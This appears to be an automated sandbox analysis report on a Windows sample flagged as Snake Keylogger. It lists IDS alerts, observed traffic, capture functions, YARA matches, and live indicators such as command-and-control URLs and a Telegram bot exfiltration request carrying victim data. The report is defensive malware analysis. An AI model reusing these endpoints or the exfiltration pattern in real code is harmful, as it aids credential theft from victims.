Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:50302
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:50301

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2001/11/2024%20/%2015:20:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 200.163.202.172.in-addr.arpa

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 01 Nov 2024 03:49:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1719951463.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000000.00000002.1723442716.0000000005719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723475118.0000000005754000.00000004.00000020.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1723554229.0000000006822000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003058000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.82
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.82$
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000424A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004126000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004225000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000424A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004126000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004174000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004225000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F8A000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, 2Lzx7LMDWV.exe, 00000004.00000002.4148303554.0000000004101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4145541161.0000000003093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, COVID19.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_009FDD7C	0_2_009FDD7C
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_0514B288	0_2_0514B288
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05145578	0_2_05145578
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05145568	0_2_05145568
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05145131	0_2_05145131
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05145140	0_2_05145140
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05144D08	0_2_05144D08
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05146C50	0_2_05146C50
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_0514793C	0_2_0514793C
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 0_2_05146818	0_2_05146818
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCD278	4_2_02CCD278
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC5362	4_2_02CC5362
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCC146	4_2_02CCC146
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC7118	4_2_02CC7118
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCC738	4_2_02CCC738
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC6498	4_2_02CC6498
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCC468	4_2_02CCC468
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCD548	4_2_02CCD548
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCCA08	4_2_02CCCA08
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCE988	4_2_02CCE988
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC69A0	4_2_02CC69A0
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCCFAA	4_2_02CCCFAA
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCCCD8	4_2_02CCCCD8
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC9DE0	4_2_02CC9DE0
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCF631	4_2_02CCF631
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCFA88	4_2_02CCFA88
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC29E0	4_2_02CC29E0
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CCE97A	4_2_02CCE97A
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4_2_02CC3E09	4_2_02CC3E09

Source: 2Lzx7LMDWV.exe

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: 2Lzx7LMDWV.exe, 00000000.00000002.1719951463.0000000002841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 2Lzx7LMDWV.exe
